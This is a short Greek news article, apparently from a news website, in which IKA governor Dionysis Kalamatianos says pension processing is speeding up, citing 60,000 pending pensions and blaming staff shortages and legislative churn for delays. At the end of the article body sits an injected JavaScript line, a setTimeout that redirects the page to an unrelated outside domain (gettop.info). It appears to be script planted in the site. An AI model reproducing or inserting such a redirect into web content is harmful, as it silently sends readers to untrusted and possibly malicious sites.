Διοικητής ΙΚΑ: Έχουμε προβεί στις απαραίτητες ενέργειες για την ταχύτερη απονομή συντάξεων

0
6

 

Τη διαβεβαίωση ότι το ΙΚΑ έχει προβεί σε όλες τις αναγκαίες και απαραίτητες ενέργειες για την ταχύτερη απονομή συντάξεων δίνει ο διοικητής του ΙΚΑ Διονύσης Καλαματιανός, με δήλωσή του στο Αθηναϊκό Πρακτορείο, σχολιάζοντας τα χθεσινά στοιχεία που παρουσιάστηκαν στο συνέδριο της Πανελλήνιας Ομοσπονδίας Συλλόγων Εργαζομένων (ΠΟΣΕ-ΙΚΑ) σχετικά με την τρέχουσα οικονομική του κατάσταση.

Όπως επισημαίνει, η εικόνα στην απονομή των κύριων συντάξεων γήρατος, αναπηρίας και θανάτου βαίνει συνεχώς βελτιούμενη, σε σχέση με τα προηγούμενα χρόνια. Συγκεκριμένα, αναφέρει ότι εκκρεμούν στο ΙΚΑ 60.000 κύριες συντάξεις και «από αυτές έχουν εκδοθεί 12.000 προσωρινές αποφάσεις και καταβάλλονται προκαταβολές». «Το αποτέλεσμα αυτό είναι συνάρτηση στοχευμένης και συστηματικής παρέμβασης», σημειώνει, προσθέτοντας ότι «έχουν συσταθεί ομάδες εργασίας γι’ αυτό το σκοπό και, ήδη, αποστέλλονται οι φάκελοι σε υποκαταστήματα που εκδίδουν ταχύτερα αποφάσεις».

Ο κ. Καλαματιανός, μέσω της δήλωσής του στο ΑΠΕ-ΜΠΕ, αποδίδει τις καθυστερήσεις που παρατηρούνται στην απονομή των συντάξεων, στη μεγάλη έλλειψη προσωπικού, στην έλλειψη ηλεκτρονικών διασυνδέσεων και σύγχρονων συστημάτων, καθώς και στη συνεχή μεταβολή της ασφαλιστικής νομοθεσίας, ενώ, για την εφαρμογή του νόμου 4387/2016, από τον Μάιο και μετά, διευκρινίζει ότι αναμένεται η έκδοση από το αρμόδιο υπουργείο αναγκαίων οδηγιών και εγκυκλίων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here